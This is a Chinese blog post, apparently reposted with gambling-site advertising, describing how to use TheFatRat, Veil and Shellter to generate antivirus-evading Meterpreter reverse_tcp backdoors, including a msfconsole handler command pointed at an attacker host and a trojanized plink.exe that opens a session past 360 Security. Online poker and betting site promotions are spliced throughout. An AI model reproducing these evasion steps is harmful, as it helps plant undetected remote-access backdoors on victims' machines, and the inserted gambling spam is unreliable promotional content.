【PokerStars】免杀工具 windows免杀工具三部曲(一)

2021年5月11日06:41:19 发表评论
摘要

在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具(亲测有效)

PokerStars亚洲版(6UPDH.COM)全球最大德州扑克平台,发牌公正,与世界玩家同台竞技
大发扑克|dafapoker|大发在线德州扑克|大发德州扑克策略网站——大发游戏导航(dfyxdh.com)
迈博myball最新网站|迈博体育官网|最好玩的体育直播观看平台——迈博体育导航(mbo388.com)
SOON88顺博|顺博官网|顺博娱乐场|顺博体育|顺博游戏网址发布页——顺博体育导航(shb388.com)

免杀工具

前言

在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具(亲测有效)

实验环境

windows 7 (安装电脑管家)(IP:192.168.72.154)
kali (IP:192.168.72.173)
windows 10 (360安全卫士)(IP:192.168.72.1)

TheFatRat工具

安装

参考资料:Msfvenom傻瓜化后门生成工具
安装过程不算麻烦。我这里已经安装好啦。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

使用

【PokerStars】免杀工具 windows免杀工具三部曲(一)

选择生成bat文件,听说可以过360。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

选择经常使用的payload,和metasploit保持一致。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

这里会生成bat文件。该代码为bat源码。
将生成的kali.bat文件剪贴到windows7靶机上进行测试。

msfconsole use exploit/multi/handler set payload  windows/meterpreter/reverse_tcpset lport 5555set lhost 192.168.72.173

【PokerStars】免杀工具 windows免杀工具三部曲(一)

经测试发现可以电脑管家没有报毒,但无法绕过360安全卫士。

Veil工具

安装

veil-evasion工具安装起来比较麻烦,我也是安装好久也装上的。但依然存在问题。
如果感觉安装过程太繁琐,可以去云盘上下载直接使用。
下载地址见页尾
这里推荐veil3.1版本的安装教程:Veil3.1免杀安装

【PokerStars】免杀工具 windows免杀工具三部曲(一)

使用

【PokerStars】免杀工具 windows免杀工具三部曲(一)

选择C语言编写的payload。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

进行必要的配置。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

生成文件的信息。
将生成文件kali.exe剪切到windows7下进行测试。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

依然是绕过电脑管家,无法绕过360。
在尝试使用 python/shellcode_inject/aes_encrypt模块时出现了错误,无法进行有效免杀

Shellter工具

安装

Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件
我并没有git下来进行安装,而是使用的命令

apt-get install shellter 

【PokerStars】免杀工具 windows免杀工具三部曲(一)

应用

【PokerStars】免杀工具 windows免杀工具三部曲(一)

PE目标为plink.exe

cp /usr/share/windows-binaries/plink.exe  /root

【PokerStars】免杀工具 windows免杀工具三部曲(一)

依然是选择熟悉的reverse_tcp,进行一些配置即可。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

将生成的文件剪切到windows下。
在windows10通过cmd运行plink.exe

plink.exe  192.168.72.173

更多的使用方法--help

【PokerStars】免杀工具 windows免杀工具三部曲(一)

同样的配置。

【PokerStars】免杀工具 windows免杀工具三部曲(一)

成功得到session会话,且没有被360安全卫士拦截。

附加:

我这里把安装好的环境克隆出来了。下载后只需要打来虚拟机运行即可。
用户名root,密码123456..
百度云盘
https://pan.baidu.com/s/1P9dOiSncPga2lBeZ4xxxdg
提取码: xc37

6UP扑克之星官网发布页:www.6updh.com

蜗牛扑克官方网址:www.allnew366.com
天龙扑克官方网址:www.tianlongqipai.com
神扑克(Shenpoker)导航:http://www.spkdh.com

博狗最新官方网址:www.xbgwz.com

以上资讯由扑克之星亚洲版整理提供!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: